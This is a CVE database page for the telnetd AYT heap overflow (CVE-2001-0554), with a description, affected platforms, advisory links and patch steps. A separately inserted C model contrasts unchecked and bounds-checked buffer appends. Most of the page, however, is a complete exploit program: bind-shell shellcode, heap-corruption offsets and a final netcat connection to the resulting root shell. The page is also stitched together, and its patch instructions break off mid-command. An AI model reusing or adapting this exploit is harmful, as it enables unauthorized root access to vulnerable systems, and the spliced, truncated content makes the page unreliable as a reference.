CVE-2001-0554
CVSS 10.0
Published: 2001-08-14 00:00:00
Revised: 2008-09-05 16:24:23

[Original] Buffer overflow in BSD-based telnetd telnet daemon on various operating systems allows remote attackers to execute arbitrary commands via a set of options including AYT (Are You There), which is not properly handled by the telrcv function.


[CNNVD] Multiple vendor BSD-based telnetd remote heap overflow vulnerability (CNNVD-200108-082)

        
Telnet is a widely used plaintext virtual-terminal protocol for remote connections, used to operate remote computers. Most telnetd versions in use today derive from BSD telnetd.
telnetd implementations derived from the BSD telnet daemon contain a heap overflow vulnerability; a remote attacker may be able to exploit it to execute arbitrary commands on the host with the privileges of the telnetd daemon (usually root).
The function that processes telnet protocol options performs no effective bounds checking, so a buffer overflow can occur when certain options ('AYT') are used. Because the characters the attacker can control are limited and the overflow occurs in the BSS segment, the attack is somewhat constrained. However, the discoverers report that the attack is practical on at least some systems (FreeBSD/BSDI/NetBSD), and a working exploit program has circulated widely.
On Linux systems, if a user can obtain local access to the system, they can use the telnetd vulnerability to set environment variables for /bin/login, for example LD_PRELOAD=/tmp/make-rootshell.so.
If the user has no local access, they can overwrite some of the chunk structures that setenv(3) uses and place a new chunk in memory the user controls, so that when the environment variables are reallocated, the value at an arbitrary memory address is changed.
The latest reports indicate that Linux netkit-telnetd versions <= 0.17 are all affected, and an attacker may be able to obtain root privileges remotely.
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker does not need LAN or local access]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:8.0
cpe:/o:netbsd:netbsd:1.1  NetBSD 1.1
cpe:/a:mit:kerberos:1.0
cpe:/o:freebsd:freebsd:3.5.1  FreeBSD 3.5.1
cpe:/o:netbsd:netbsd:1.5  NetBSD 1.5
cpe:/o:netbsd:netbsd:1.3.2  NetBSD 1.3.2
cpe:/o:ibm:aix:4.3.2  IBM AIX 4.3.2
cpe:/o:ibm:aix:5.1  IBM AIX 5.1
cpe:/a:mit:kerberos:5-1.2.1  MIT Kerberos 5 1.2.1
cpe:/o:openbsd:openbsd:2.6  OpenBSD 2.6
cpe:/o:sun:solaris:2.4
cpe:/o:netbsd:netbsd:1.3  NetBSD 1.3
cpe:/o:netbsd:netbsd:1.4  NetBSD 1.4
cpe:/o:freebsd:freebsd:4.2  FreeBSD 4.2
cpe:/o:openbsd:openbsd:2.4  OpenBSD 2.4
cpe:/o:netbsd:netbsd:1.2  NetBSD 1.2
cpe:/o:netbsd:netbsd:1.4.1  NetBSD 1.4.1
cpe:/o:netbsd:netbsd:1.3.1  NetBSD 1.3.1
cpe:/o:sun:solaris:2.3
cpe:/o:openbsd:openbsd:2.1  OpenBSD 2.1
cpe:/o:sun:solaris:2.1
cpe:/a:mit:kerberos:5-1.2  MIT Kerberos 5 1.2
cpe:/o:sun:solaris:7.0
cpe:/o:openbsd:openbsd:2.0  OpenBSD 2.0
cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:2.0
cpe:/a:netkit:linux_netkit:0.11
cpe:/o:sun:solaris:2.5.1
cpe:/o:openbsd:openbsd:2.3  OpenBSD 2.3
cpe:/a:mit:kerberos:5_1.1.1  MIT Kerberos 5 1.1.1
cpe:/o:ibm:aix:4.3  IBM AIX 4.3
cpe:/o:ibm:aix:4.3.1  IBM AIX 4.3.1
cpe:/o:openbsd:openbsd:2.5  OpenBSD 2.5
cpe:/a:mit:kerberos:5-1.2.2  MIT Kerberos 5 1.2.2
cpe:/o:netbsd:netbsd:1.5.1  NetBSD 1.5.1
cpe:/o:openbsd:openbsd:2.7  OpenBSD 2.7
cpe:/a:netkit:linux_netkit:0.10
cpe:/o:netbsd:netbsd:1.4.2  NetBSD 1.4.2
cpe:/o:netbsd:netbsd:1.2.1  NetBSD 1.2.1
cpe:/o:netbsd:netbsd:1.0  NetBSD 1.0
cpe:/o:openbsd:openbsd:2.2  OpenBSD 2.2
cpe:/o:sun:solaris:2.2
cpe:/o:sgi:irix:6.5  SGI IRIX 6.5
cpe:/o:netbsd:netbsd:1.3.3  NetBSD 1.3.3
cpe:/a:netkit:linux_netkit:0.12
cpe:/a:mit:kerberos:5_1.1  MIT Kerberos 5 1.1
cpe:/o:freebsd:freebsd:4.3  FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.1.1  FreeBSD 4.1.1
cpe:/o:openbsd:openbsd:2.8  OpenBSD 2.8
cpe:/o:ibm:aix:4.3.3  IBM AIX 4.3.3
cpe:/o:netbsd:netbsd:1.4.3  NetBSD 1.4.3

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1828  Buffer Overflow in "in.telnetd" or "telnetd" Process
* OVAL describes in detail how to detect this vulnerability; the related OVAL definition contains further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0554
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0554
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-082
(Official data source) CNNVD

- Other links and resources

http://www.cert.org/advisories/CA-2001-21.html
(VENDOR_ADVISORY)  CERT  CA-2001-21
http://www.securityfocus.com/bid/3064
(VENDOR_ADVISORY)  BID  3064
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc
(VENDOR_ADVISORY)  FREEBSD  FreeBSD-SA-01:49
http://xforce.iss.net/static/6875.php
(UNKNOWN)  XF  telnetd-option-telrcv-bo(6875)
http://www.securityfocus.com/archive/1/197804
(VENDOR_ADVISORY)  BUGTRAQ  20010718 multiple vendor telnet daemon vulnerability
http://www.redhat.com/support/errata/RHSA-2001-100.html
(UNKNOWN)  REDHAT  RHSA-2001:100
http://www.redhat.com/support/errata/RHSA-2001-099.html
(UNKNOWN)  REDHAT  RHSA-2001:099
http://www.osvdb.org/809
(UNKNOWN)  OSVDB  809
http://www.novell.com/linux/security/advisories/2001_029_nkitb_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:029
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-068.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:068
http://www.debian.org/security/2001/dsa-075
(UNKNOWN)  DEBIAN  DSA-075
http://www.debian.org/security/2001/dsa-070
(UNKNOWN)  DEBIAN  DSA-070
http://www.cisco.com/warp/public/707/catos-telrcv-vuln-pub.shtml
(UNKNOWN)  CISCO  20020129 Cisco CatOS Telnet Buffer Vulnerability
http://www.ciac.org/ciac/bulletins/l-131.shtml
(UNKNOWN)  CIAC  L-131
http://www.calderasystems.com/support/security/advisories/CSSA-2001-030.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-030.0
http://online.securityfocus.com/archive/1/203000
(UNKNOWN)  BUGTRAQ  20010810 ADV/EXP: netkit <=0.17 in.telnetd remote buffer overflow
http://online.securityfocus.com/archive/1/199541
(UNKNOWN)  BUGTRAQ  20010725 SCO - Telnetd AYT overflow ?
http://online.securityfocus.com/archive/1/199496
(UNKNOWN)  BUGTRAQ  20010725 Telnetd AYT overflow scanner
http://online.securityfocus.com/advisories/3476
(UNKNOWN)  IBM  MSS-OAR-E01-2001:298
http://ftp.support.compaq.com/patches/.new/html/SSRT0745U.shtml
(UNKNOWN)  COMPAQ  SSRT0745U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000413
(UNKNOWN)  CONECTIVA  CLA-2001:413
http://archives.neohapsis.com/archives/hp/2001-q4/0014.html
(UNKNOWN)  HP  HPSBUX0110-172
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.10/CSSA-2001-SCO.10.txt
(UNKNOWN)  CALDERA  CSSA-2001-SCO.10
ftp://patches.sgi.com/support/free/security/advisories/20010801-01-P
(UNKNOWN)  SGI  20010801-01-P
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-012.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2001-012

- Vulnerability information

Multiple vendor BSD-based telnetd remote heap overflow vulnerability
Critical  Unknown
2001-08-14 00:00:00  2007-05-11 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Disable telnet and switch to ssh or openssh.
        Because telnet transmits information in plaintext, the protocol itself is inherently weak and is easily subject to eavesdropping, replay and hijacking attacks; we therefore recommend replacing telnet for remote administration with a considerably safer remote-access tool based on the encrypted SSH protocol.
        Vendor patches:
        BSDI
        ----
        The vendor has released upgrade patches to fix this security issue; please download them from the vendor's home page:
        BSDi BSD/OS 4.2:
        
        http://www.bsdi.com/services/support/patches/patches-4.2/i386/M420-014

        BSDi BSD/OS 4.1:
        
        http://www.bsdi.com/services/support/patches/patches-4.1/M410-043

        Conectiva
        ---------
        Conectiva has released a security advisory (CLA-2001:413) and corresponding patches for this issue:
        CLA-2001:413: telnet
        Link:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000413

        Patch downloads:
        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/telnet-0.17-1U40_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/telnet-0.17-1U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/telnet-0.17-1U40_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/telnet-0.17-1U40_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/telnet-0.17-1U41_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/telnet-0.17-1U41_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/telnet-0.17-1U42_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/telnet-0.17-1U42_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/telnet-0.17-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/telnet-server-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/telnet-0.17-1U51_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-server-0.17-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/telnet-0.17-1U51_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/telnet-0.17-2U60_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-server-0.17-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/telnet-0.17-2U60_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/telnet-0.17-2U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-0.17-2U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/telnet-server-0.17-2U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/telnet-0.17-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/telnet-server-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/telnet-0.17-1U50_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-0.17-1U50_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/telnet-server-0.17-1U50_1cl.i386.rpm
        Users of Conectiva Linux 6.0 and later can update the RPM packages with apt:
        - Add the following line to /etc/apt/sources.list:
        
        rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
        (If you are not running version 6.0, replace the 6.0 above with the appropriate version number.)
        - Run: apt-get update
        - After updating, run: apt-get upgrade
        FreeBSD
        -------
        FreeBSD has released a security advisory (FreeBSD-SA-01:54) and corresponding patches for this issue:
        FreeBSD-SA-01:54: telnetd contains remote buffer overflow
        Link: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:54.ports-telnetd.asc
        Patch downloads:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
        HP
        --
        HP has released a security advisory (HPSBUX0110-172) and corresponding patches for this issue:
        HPSBUX0110-172: Sec. Vulnerability in telnetd
        Link:
        Patch downloads:
        ftp://us-ffs.external.hp.com/hp-ux_patches
        System version to patch number mapping:
         10.01 PHNE_24820,
         10.10 PHNE_24820,
         10.20 PHNE_24821,
         SIS 10.20 PHNE_24822 (Telnet kerberos Patch),
         10.24 PHNE_25217.
        Patch installation procedure:
         1. Back up the system before installing the patch.
         2. Log in as root.
        
         3. Copy the patch to the /tmp directory.
        
         4. Change to /tmp and unshar the patch:
        
         cd /tmp
         sh PHCO_xxxxxx
        
         5a. On a standalone system, run swinstall to install the patch:
        
         swinstall -x autoreboot=true -x match_target=true \

- Vulnerability information (21018)

Solaris 2.x/7.0/8, IRIX 6.5.x, OpenBSD 2.x, NetBSD 1.x, Debian 3, HP-UX 10 Telnetd Buffer Overflow (EDBID:21018)
unix remote
2001-07-18 Verified
0 Dvorak
source: http://www.securityfocus.com/bid/3064/info

A boundary condition error exists in telnet daemons derived from the BSD telnet daemon.

Under certain circumstances, the buffer overflow can occur when a combination of telnet protocol options are received by the daemon. The function responsible for processing the options prepares a response within a fixed sized buffer, without performing any bounds checking.

This vulnerability is now being actively exploited. A worm is known to be circulating around the Internet. 
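The flaw class described above (the CNNVD write-up's "no effective bounds checking" in the option handler, and the BID text's reply "prepared within a fixed sized buffer") modelled in C as an added example. This is not code from telnetd, from the CNNVD entry or from the Exploit-DB entry that follows; the buffer size, the guard region, the function names and the use of "clarity.local" as a sample hostname are constructed for the demonstration. The vulnerable append is shown beside a bounds-checked one, and a guard region after the buffer records how far repeated AYT replies run past it.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed model of the CVE-2001-0554 flaw class (added example).
 * A BSD-derived telnetd queues option replies in one fixed-size output
 * buffer; the AYT handler appends "\r\n[<hostname> : yes]\r\n" to it, and
 * the vulnerable code did so without checking the space left. Sizes and
 * names below are constructed, not taken from telnetd. */

#define NETOBUF_SIZE 64     /* deliberately small so the overflow is easy to reach */
#define GUARD_SIZE   256    /* canary region after the buffer that records overflow */
#define GUARD_BYTE   ((char)0xA5)

/* The "real" buffer is followed by a guard region, so the unchecked append
 * spills into memory we own and can inspect rather than into undefined memory. */
struct netobuf {
    char   data[NETOBUF_SIZE + GUARD_SIZE];
    size_t len;            /* bytes queued but not yet flushed to the client */
};

static void netobuf_init(struct netobuf *nb)
{
    memset(nb->data, 0, NETOBUF_SIZE);
    memset(nb->data + NETOBUF_SIZE, GUARD_BYTE, GUARD_SIZE);
    nb->len = 0;
}

/* Number of guard bytes overwritten; 0 means every write stayed in bounds. */
static size_t netobuf_overflow(const struct netobuf *nb)
{
    size_t clobbered = 0;
    for (size_t i = 0; i < GUARD_SIZE; i++)
        if (nb->data[NETOBUF_SIZE + i] != GUARD_BYTE)
            clobbered++;
    return clobbered;
}

/* Vulnerable pattern: copy the reply at the current offset with no check
 * against NETOBUF_SIZE. The clamp only keeps this demo inside the backing
 * array; the original code had no limit at all. */
static void append_unchecked(struct netobuf *nb, const char *reply)
{
    size_t n = strlen(reply);
    if (n > sizeof nb->data - nb->len)
        n = sizeof nb->data - nb->len;
    memcpy(nb->data + nb->len, reply, n);
    nb->len += n;
}

/* Hardened pattern: check the remaining capacity before every copy and
 * report a reply that does not fit. A real daemon would flush the buffer to
 * the client and retry, or drop the reply; nothing lands past the end. */
static int append_checked(struct netobuf *nb, const char *reply)
{
    size_t n = strlen(reply);
    if (n > NETOBUF_SIZE - nb->len)
        return -1;
    memcpy(nb->data + nb->len, reply, n);
    nb->len += n;
    return 0;
}

/* Format the AYT reply the way telnetd does; the hostname length is what
 * makes the reply size vary from host to host. */
static void ayt_reply(char *out, size_t outsz, const char *hostname)
{
    snprintf(out, outsz, "\r\n[%s : yes]\r\n", hostname);
}

/* Feed n_ayt AYT commands to the vulnerable append. Returns how many guard
 * bytes were clobbered, i.e. how far the replies ran past the buffer. */
size_t simulate_unchecked(const char *hostname, int n_ayt)
{
    struct netobuf nb;
    char reply[128];
    netobuf_init(&nb);
    ayt_reply(reply, sizeof reply, hostname);
    for (int i = 0; i < n_ayt; i++)
        append_unchecked(&nb, reply);
    return netobuf_overflow(&nb);
}

/* Same stream against the hardened append. Returns the number of replies
 * refused, or -1 if any byte reached the guard (which must never happen). */
int simulate_checked(const char *hostname, int n_ayt)
{
    struct netobuf nb;
    char reply[128];
    int refused = 0;
    netobuf_init(&nb);
    ayt_reply(reply, sizeof reply, hostname);
    for (int i = 0; i < n_ayt; i++)
        if (append_checked(&nb, reply) < 0)
            refused++;
    return netobuf_overflow(&nb) ? -1 : refused;
}

int main(void)
{
    /* Each AYT reply for "clarity.local" is 25 bytes, so three exceed 64. */
    printf("unchecked, 3 x AYT: %zu bytes past the buffer\n",
           simulate_unchecked("clarity.local", 3));
    printf("checked,   3 x AYT: %d reply refused, no overflow\n",
           simulate_checked("clarity.local", 3));
    return 0;
}
```

The point the model makes is the one the fix relied on: the reply length is data-dependent (hostname length times the number of option commands the client sends), so the only safe append is one that compares against the remaining capacity before copying, never one that assumes a reply will fit.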

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>

/*********************************************************************
       Proof of concept netkit-0.17-7 local root exploit.

 Exploits buffer overflow in the AYT handling of in.telnetd, 
 due to bad logic in the handling of snprintf(), and 

      TESO advisory details were enough to allow me to put 
        controlable addresses in arbitary heap locations. 

    Heap based exploit. Overflow allows rewriting of some heap 
     data, which allowed me to put a new heap structure in the 
          input buffer, which let me do whatever I want.

'traceroute exploit story -  By Dvorak, Synnergy Networks' was very
 helpful. Also malloc.c was good. 

*********************************************************************/
/*
                         Notes about exploit                       

1) RedHat 7.0, exploiting localhost
2) hostname is clarity.local
3) It probably won't work without at least a different setting for
   the --size option, and probably the --name option as well. The
   --name arguemnt  is the hostname part of the string that gets 
   returned by the AYT command, which may be different to the name
   of the address you are connecting to..
4) There are a lot of things that use the heap, making the size 
   depend on alot of factors. 

5) You will might need to change some (or all) of the offsets. 
   This program does allow you to brute force, if the hostname returned 
   by the AYT command is not a multiple of 3 letters long.
 
 It is also possibly (at least according to some quick testing I did)
 exploitable on some (all?) servers with names that are multiples of three
 letters long, using the Abort Output command to add 2 characters to the
 output length, and exploit the heap in a similar manner to this method.
 
 (You can only directly put user controlable characters in 2 out of 3
 locations (ie: no AO will give you a multiple of 3 bytes on the heap, AO
 will give you 2 more than a multiple of 3 bytes) with controllable
 characters, but when you count the null added by the netoprintf(), and use
 0 as an option to a do or will, you can sometimes create valid chunks that
 point to locations you can control. I have only tested this method with a 
 simulation, but it seems it would probably work with the telnetd as well.
 I will look into it when I have time. Maybe.)
 

                       .  .  _  _   _  _ .  .     _  _  _ .  .
 |_  _|_ _|_  _ .  / / |\/| |_| _| |  | ||\/|  / |  | ||_ |  |
 | |  |   |  |_|. / /  |  | |   _|.|_ |_||  | /  |_ |_| _| \/ 
             |
 *********************************************************************/




#define SERVER_PORT 23

#define ENV 18628

int offset12[] = {
// netibuf[343]->the chunk start.
  -4, 0xaa,
  -5, 0xbb,
  -6, 0xcc,
  -7, 0x10,
  -9, 0xdd,
  -10, 0x68,
  -12, 0xee,
  -13, 0x88,
  -14, 0x99,
  0, 0x00
};

int offset3[]={
-1,0x00,
0,0
};

int *offsets=offset12;


int dalen = 0;
int big;
int small;
int mipl = 0;
int ninbufoffset;
char spinchars[] = "/|\\-";

char tosend[] = {
  0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 0x1f, 0xff, 0xfb, 0x20,
  0xff, 0xfb, 0x21, 0xff, 0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,
  0xff, 0xfb, 0x23, 0
};

char lamagra_bind_code[] =
// the NOPs are my part... to jump over the modified places, 
// without me having to take a look to see where they are.
// Modified to listen on 7465 == TAGS and work thru TELNET protocol.
  "\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90\xeb\x20\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
  "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
  "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
  "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
  "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
  "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
  "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
  "\x8d\x55\x0c\xcd\x80\xe8\xe3"
  "\xff\xff\xff\xff\xff\xff/bin/sh";

char *shellcode = lamagra_bind_code;

int sock;			/* fd for socket connection */
FILE *dasock;			/* for doing fprint et al   */
struct sockaddr_in server;	/* the server end of the socket  */
struct hostent *hp;		/* Return value from gethostbyname() */
char buf[40960];		/* Received data buffer */
char sock_buf[64 * 1024];	/* Received data buffer */

char daenv[10000];
char oldenv[10000];

extern int errno;
read_sock ()
{
  /* Prepare our buffer for a read and then read. */
  bzero (buf, sizeof (buf));
  if (read (sock, buf, sizeof (buf)) < 0)
    if (errno != 11)
      {
	perror ("! Socket read");
	exit (1);
      }
}

sock_setup ()
{
  int flags;
  int yes = 1;
  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror ("! Error making the socket\n");
      exit (1);
    }
  bzero ((char *) &server, sizeof (server));
  server.sin_family = AF_INET;
  if ((hp = gethostbyname ("localhost")) == NULL)
    {
      fprintf (stderr, "! localhost unknown??\n");
      exit (1);
    }
  bcopy (hp->h_addr, &server.sin_addr, hp->h_length);
  server.sin_port = htons ((u_short) SERVER_PORT);

  /* Try to connect */
  if (connect (sock, (struct sockaddr *) &server, sizeof (server)) < 0)
    {
      perror ("! Error connecting\n");
      exit (1);
    }

  dasock = (FILE *) fdopen (sock, "w+");
  if (!dasock)
    {
      perror ("! Bad fdopen happened");
      exit (1);
    }

/****************************************
 Thanks to xphantom for the next 4 lines.
 (which i don't need anymore   ;? )
 
  flags = fcntl(sock, F_GETFL, 0); 
  flags |= O_NONBLOCK; 
  fcntl(sock, F_SETFL, flags);
  if (setsockopt(sock, SOL_SOCKET, SO_OOBINLINE, &yes,sizeof(yes)) == -1) {
        perror("setsockopt");
        exit(1);
  }  
*****************************************/


  setbuffer (dasock, sock_buf, 64 * 1024);

}

do_iac (char c)
{
  putc (0xff, dasock);
  putc (c, dasock);
}

do_ayt ()
{
  do_iac (0xf6); // sets buffer length to 2
}

doo (char c)
{
  putc (255, dasock);
  putc (253, dasock);
  putc (c, dasock);
}
will (char c)
{
  putc (255, dasock);
  putc (251, dasock);
  putc (c, dasock);
}
wont (char c)
{
  putc (255, dasock);
  putc (252, dasock);
  putc (c, dasock);
}

void
solve (int remain)
{
  int x, y;
  big = -100;
  small = -100;
  for (x = 0; x < 120; x++)
    for (y = 2; y < 80; y++)
      {
	if (((y * 3) + (x * dalen)) == remain)
	  {
	    big = x;
	    small = y;
	    return;
	  }
      }
      fprintf (stderr, "I still can't work it out.\n\n");
      exit (1);
}

push_clean ()
{
  int l;
  for (l = 0; l < 8192; l++)
    putc (0, dasock);	
}

push_heap_attack ()
{
  int l;
  int shaddr = 0x805c970;
  int overwrite = 0x08051e78;	// fopen
  int tosend[] = {
    0x805670eb,
    0x8,
    shaddr,
    shaddr,
    0x0,
    0x0,
    overwrite - 12,
    shaddr
  };
  fwrite (shellcode, strlen (shellcode), 1, dasock);
  for (l = strlen (shellcode); l < 289 + ninbufoffset; l++)
    putc (0, dasock);
  fwrite (tosend, 8, 4, dasock);
  fflush (dasock);
}

fill2 (int count, char with, int real)
{
  int l;
  int first, rest, find;

  first = (int) (count / dalen) - 10;
  rest = (int) (((count) % dalen) / 3) * 3;
  find = count - ((first * dalen) + (rest * 3));
  solve (find);
  first += big;
  rest += small;
  for (l = 0; l < first; l++)
    do_ayt ();
  for (l = 0; l < rest; l++)
    will (with);
  if (real == 1)
    {
      push_clean ();
    }
}

fill (int count, char with)
{
  fprintf (stderr, "  o Length %d char %d (%02x)\n",
	   count, with & 0xff, with & 0xff);
  fflush (stderr);
  fill2 (8257, 'z', 0);		// first part
  fill2 (count - 8257, with, 1);	// do it for real
}

doenv (char *danam, char *daval)
{
  sprintf (daenv, "%c%c%c%c%c%s%c%s%c%c",
       /*  IAC   SB N-E IS VAR  name VAL value  IAC  SE  */
	   255, 250, 39, 0, 0, danam, 1, daval, 255, 240);

  fwrite (daenv, 512, 1, dasock);
  fflush (dasock);
}

main (int argc, char *argv[])
{
  int br, l, dosleep = 0;
  int percent = 0;
  char spin;
  unsigned char w;
  bzero (oldenv, sizeof (oldenv));
  argv++;
  dalen = strlen ("clarity.local");
  while (argv[0])
    {
      if (!strcmp (argv[0], "--pause"))
	dosleep = 1;

      if (!strcmp (argv[0], "--size") && argv[1])
	{
	  mipl = atoi (argv[1]);
	  argv++;
	}

      if (!strcmp (argv[0], "--name") && argv[1])
	{
	  dalen = strlen (argv[1]);
	  argv++;
	}
      argv++;
    }
  fprintf (stderr, "  o MiPl of %4d  o NameLen of %2d\n", mipl, dalen);
  if(dalen%3==0)
  {
   offsets=offset3;
  }
  else
  {
   ninbufoffset = mipl % 8192;
   offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
   if (offsets[11] > 255)
     {
       fprintf (stderr, "  ! MiPl too big.", mipl, dalen);
       exit (1);
     }
   }
  sock_setup ();
  if (dosleep)
    {
      system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
      sleep (8);
    }

  dalen += strlen ("\r\n[ : yes]\r\n");
  fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
  fflush (stderr);
  doo (5);
  will (39);
  fflush (dasock);
  read_sock ();
  fprintf (stderr, "o Setting up environment vars...\n");
  fflush (stderr);
  will (1);
  push_clean ();
  doenv ("USER", "zen-parse");
  doenv ("TERM", "zen-parse");
  will (39);
  fflush (dasock);
  fprintf (stderr, "o Doing overflows...\n");
  fflush (stderr);
  for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)
    {
      fill (mipl + ENV + offsets[br], offsets[br + 1]);
      fflush (dasock);
      usleep (100000);
      read_sock ();
    }
  fprintf (stderr, "o Overflows done...\n");
  fflush (stderr);
  push_clean ();

  fprintf (stderr, "o Sending IACs to start login process...\n");
  fflush (stderr);
  wont (24);
  wont (32);
  wont (35);
  fprintf (dasock, "%s", tosend);
  will (1);
  push_heap_attack ();
  sleep (1);
  fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
  execlp ("nc", "nc", "-v", "localhost", "7465", 0);
  fprintf (stderr,
	   "o If the exploit worked, there should be an open port on 7465.\n");
  fprintf (stderr, "  It is a root shell. You should probably close it.\n");
  fflush (stderr);
  sleep (60);
  exit (0);
}
/********************************************************************

 Thanks to xphantom for the help with getting the some of the socket 
 stuff working properly. Erm. I didn't end up using that method, but
                         thanks anyway. ;]

This code is Copyright (c) 2001 zen-parse
Use and distribution is unlimited, provided the code is not modified.
If the code, including any of text is modified, that version may not
be redistrubuted.

********************************************************************/
/* ObPlug 4 My Band: gone platinum, Chapel of Stilled voices, from */
/********************************************************************
            Remember to visit Chapel of Stilled Voices:
                                 _                 _     _ .  .
   |_  _|_ _|_  _ .  / /.  .  _  _|  _  _ .  .  / |   _ |_ |  |
   | |  |   |  |_|. / / |\/| |_| _|.|_ |_||\/| /  |_ |_| _| \/ 
  - - - - - - -|- - - - - - -|- - - - - - - - - - - - - - - - - -
               |             |
If there is anything below the next line someone is not following the
rules.  --zen-parse
************************************END*****************************/
		

- Vulnerability information (F34414)

